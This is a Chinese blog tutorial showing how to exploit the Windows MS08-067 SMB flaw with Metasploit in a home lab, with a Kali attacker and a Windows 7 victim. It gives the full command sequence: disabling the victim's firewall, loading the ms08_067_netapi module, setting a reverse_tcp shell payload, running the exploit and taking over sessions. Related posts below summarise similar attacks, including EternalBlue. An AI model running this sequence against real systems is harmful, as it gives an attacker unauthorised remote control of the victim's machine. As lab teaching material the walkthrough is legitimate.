网络安全工程师演示:黑客是如何利用ms08-067漏洞进行计算机攻防的?

最新推荐文章于 2023-04-10 16:02:05 发布
最新推荐文章于 2023-04-10 16:02:05 发布
阅读量495 收藏 4
点赞数
分类专栏: 科技 黑客 IT技术 文章标签: 网络 计算机网络 信息安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiao1234oaix/article/details/109600766
版权
黑客 同时被 3 个专栏收录
192 篇文章 31 订阅
订阅专栏
科技
187 篇文章 10 订阅
订阅专栏
IT技术
173 篇文章 3 订阅
订阅专栏

课前声明:
1、本分享仅做学习交流,请自觉遵守法律法规!
2、搜索:Kali 与编程,学习更多网络攻防干货!
3、Kali 与编程每天准时更新,敬请学习和关注!
正文部分
一、背景介绍
Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework,简称叫做MSF。Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的漏洞脚本,从而进行测试。Metasploit(msf)究竟威力如何呢?如何利用木马控制受害者主机呢?接下来让我们一起学习!
二、资源装备
1.安装好 Win7的虚拟机一台
2.整装待发的小白一个。
3.安装好的Kali Linux虚拟机一台。
三、战略安排
3.1 在微软官网查看微软发布的关于Windows系统的相关漏洞信息,如下图所示,这里我们重点介绍一下MS08-067漏洞。
在这里插入图片描述
在这里插入图片描述

3.2 在受害者Windows主机中关闭相应的防火墙以及对应的安全卫士,如下图所示。
步骤:关闭防火墙
命令:Windows键+R/输入cmd/进入dos界面/
命令:firewall.cpl
步骤:关闭防火墙。
在这里插入图片描述

3.3 查看受害者主机以及攻击者主机的IP地址,如下图所示。
命令:ipconfig
在这里插入图片描述

命令:ifconfig
在这里插入图片描述

3.4 进入Metasploit(msf)渗透框架,如下图所示。
命令:msfconsole
在这里插入图片描述

步骤1:检索关于MS08-067的漏洞利用模块,如下图所示。
命令:search ms08-067
在这里插入图片描述

步骤2:使用对应的漏洞利用模块,如下图所示。
命令:use exploit/windows/smb/ms08_067_netapi
在这里插入图片描述

步骤3:设置漏洞对应的攻击参数,如下图所示。
命令:show options(查看有哪些需要设置的攻击参数)
在这里插入图片描述

命令:set payload windows/shell/reverse_tcp
在这里插入图片描述

命令:set rhosts 192.168.126.159(受害者主机)
在这里插入图片描述

命令:set lhost 192.168.126.186(攻击者主机)
命令:show target(查看可以攻击的系统列表)

在这里插入图片描述
命令:set target 34

在这里插入图片描述
步骤4:查看参数是否配置成功,如下图所示。
命令:show options

步骤5:执行漏洞利用模块,如下图所示。
命令:exploit
在这里插入图片描述

3.5 攻击成功,成功拿下目标主机,如下图所示。
在这里插入图片描述

步骤1:查看当前的会话连接,如下图所示。
命令:sessions -l
在这里插入图片描述

步骤2:切换会话,如下图所示。
命令:sessions -i 2
在这里插入图片描述
小编一个个字敲打创作,可辛苦了,问君可否关注一下我呢?你还可搜索:Kali与编程,学习更多黑客渗透技巧呢 !拒绝盗版,转载请声明来源:Kali与编程
点我学习完整视频渗透课,预计更新1000节

Kali与编程~
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
MS08-067漏洞攻击全程演示(图解).
04-28
MS08-067漏洞攻击全程演示(图解)
系统漏洞攻击
m0_52528594的博客
05-31 1367
1隐藏自己的行踪 攻击者入侵就是要神不知鬼不觉地侵入到目标计算机,因此,在入侵攻击之前要对自己做个伪装,不能让被攻击者轻易发现。在通过网络对目标计算机发起攻击之前,先对自己真实的IP地址隐藏。一般攻击者都是利用他人的电脑来隐藏自己真实的IP地址的。 2查询分析目标计算机攻击要有目标,在网络中的IP地址就能够真正标识一个在网的计算机,而域名是为了更好地对IP地址进行记忆管理的另一种显现方式,这样利用域名和IP地址就能确定目标计算机了。确定了目标计算机之后,就可以对其操作系统类型及所提供的服务等信息,做一个全方
Windows漏洞MS08-067
Nanyeer的博客
03-21 1605
MS08-067漏洞(远程命令执行漏洞)的演示
MS08-067漏洞渗透攻击过程
box
06-14 2958
实验环境 kali linux2.0 win-xp sp3 操作步骤 1.在kali linux 命令行执行 msfconsole #打开msf控制台 2.查询ms08067漏洞 search ms08-067 3.使用exploit/windows/smb/ms08_067_netapi 并查看options use exploit/windows/smb/ms08_067_n...
计算机检查漏洞方法和相应处理
caiguazheng4921的博客
04-19 262
近来******事件频频发生,我们身边的朋友可能有qq、E-mail和游戏账号被盗事件发生。现在的***技术有朝着大众化方向发展的趋势,能够掌握***他人系统技术的人越来越多了,只要你的电脑稍微有点系统Bug或者安装了有问题的应用程序,就有可能成为他人的肉鸡。如何给一台上网的机器查漏洞并做出相应的处理呢?   一、要命的端口   计算机要与外界进行通信,必须通过一些端口。...
计算机网络黑客网络攻防技术-.pdf
最新发布
02-23
计算机网络黑客网络攻防技术-.pdf
计算机病毒与防护:windows系统漏洞ms利用.ppt
06-10
计算机病毒与防护:Windows系统漏洞MS17-010详解 MS17-010是一个著名的系统漏洞,尤其以其被恶意软件WannaCry(又名WannaCryptor)利用而闻名。2017年5月,WannaCry在全球范围内引发了大规模的勒索软件攻击,对个人...
毕业:计算机网络安全概述及防范策略(完整版)资料.doc
11-30
物理安全策略可以通过控制物理访问来保护计算机网络系统,访问控制策略可以通过控制用户的访问权限来保护计算机网络系统,信息加密策略可以通过加密信息来保护计算机网络系统,网络安全管理策略可以通过管理网络系统...
计算机网络黑客防范措施-计算机安全论文-计算机论文.docx
06-07
由于任何一个操作系统和网络软件在设计上存在缺陷和错误,这就成为一种安全隐患,攻击者会直接利用代码通过漏洞很容易进入计算机系统对主机进行攻击或控制电脑。 (2)黑客的入侵。"黑客"原指热心于计算机技术,水平高超...
计算机网络安全漏洞及防范措施解析.pdf
09-20
计算机网络安全漏洞及防范措施解析】 计算机网络安全是21世纪社会发展中不可或缺的重要议题。随着计算机网络技术的广泛应用,它在各个行业中起到了革命性的作用,提高了工作效率,推动了科技进步。然而,随之而来...
(5/8 软件漏洞攻击利用技术)如何成为一名黑客网络安全从业者)——网络攻击技术篇
Mr.Quark
09-18 4144
1、软件漏洞的概念与分类         软件漏洞是指计算机系统中的软件在具体的实现、运行、机制、策略上存在的缺陷或脆弱点。攻击者可以利用漏洞获得计算机的权限。         软件漏洞按照软件类别不同,可以分为操作系统服务程序漏洞、文件处理软件漏洞、浏览器软件漏洞和其他软件漏洞等。 (1)操作系统服务程序漏洞         操作系统服务程序漏洞是针对操作系统平台中各
黑客是怎么进行网络攻击的?那位大神能讲的通俗详细一点?
Python栈_基的博客
04-10 1507
作者:郭鹏涛链接:https://www.zhihu.com/question/59080378/answer/2976915572来源:知乎著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。这个其实各种网站,看雪、freebuff、掘金......这些网站上都会有各种各样的姿势。这里简单介绍一下吧:黑客通过利用漏洞和弱点来入侵计算机系统、网络或应用程序,并获取非法的访问、控制或窃取敏感信息。具体方法和工具会有很多种,这取决于攻击的目标和攻击者的技能水平。
MS08_067漏洞复现与总结
马赛克的博客
02-28 6784
00x00 原理:攻击利用受害主机默认开放的SMB服务端口445,发送恶意资料到该端口,通过MSRPC接口调用server服务的一个函数,并破坏程序的栈缓冲区,获取远程代码执行的权限,从而完全控制主机 安全补丁:KB958644 00x01 #准备工作 两台虚拟机,一台为kali ip:10.10.10.131 一台为Windowsxpsp3英文版 ip:10.10.1...
渗透攻击漏洞利用实验(ms08-067、samba漏洞利用,ms03-026漏洞利用并长期保持)
qq_20381661的专栏
04-10 4741
(一)对MS08_067漏洞渗透攻击 1.使用msfconsole启动Metasploit终端,进入后使用search命令,搜索该漏洞对应的模块: 2.启用这个攻击模块,查看信息,设置攻击载荷: 3.查看渗透攻击所需的配置选项: 4.根据具体情况配置渗透攻击各个选项,并查看设置后的情况: 5.使用exploit发起渗透攻击,获得shell并进行简单操作: (二)利用samba漏洞 1.使用seach命令搜索samba漏洞对应的模块: 2.启用usermap_s
Windows XP SP2(MS08-067漏洞复现及利用)
sGanYu
09-03 5203
打开kali,开启msf所依赖的数据库 启动msfconsole 搜寻关于ms08-067有关的漏洞 使用 输入show options显示ms08-067模块所需的参数 配置参数,设置目标操作系统类型为4
永恒之蓝漏洞利用攻击
热门推荐
wwl012345的博客
04-20 9万+
一、基础知识介绍: 1.何为永恒之蓝? 永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎...
渗透测试漏洞利用漏洞攻击
Jeanphorn的专栏
06-14 1万+
1. 查找目标系统的相关漏洞  在前一篇渗透测试的博文中,介绍了目标系统相关信息的收集方法。接下来,任意Kioptrix靶机为例,具体介绍下相关漏洞的详细利用过程。   在exploit-db.com网站上,一般能够找到已知漏洞的有价值的信息,以及验证其有效性的概念验证代码(POC)。概念验证代码可以帮助你理解这个漏洞的原理和形成机制,从而让你能够确定防护措施是否正常工作。2. 离线的漏洞库  在
0x2Meterpreter后漏洞利用攻击教程
si1ence的博客
07-28 576
Meterpreter的攻击场景一般为先向被攻击系统发送一个攻击载荷(payload),该攻击载荷会反向链接到meterpreter,然后发送一个Meterpeter Server dll紧接着发送第二个dll注入攻击载荷完成一个socket的,这样服务器与客户端的meterpreter会话就生成了。 Meterpreter链接上后具有很多功能如下 基于不同的用途,这里列举这些命令的部分 ...
经典利用永恒之蓝漏洞Windows操作系统进行攻击
qq_46202048的博客
11-25 1万+
利用永恒之蓝对Windows进行攻击 环境搭建:kali、Windows server 2008R2、Windows 7,其中Windows server 2008R2\WIN7为靶机。 首先简单介绍一下什么是永恒之蓝,永恒之蓝【Eternal Blue】爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Kali与编程~

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值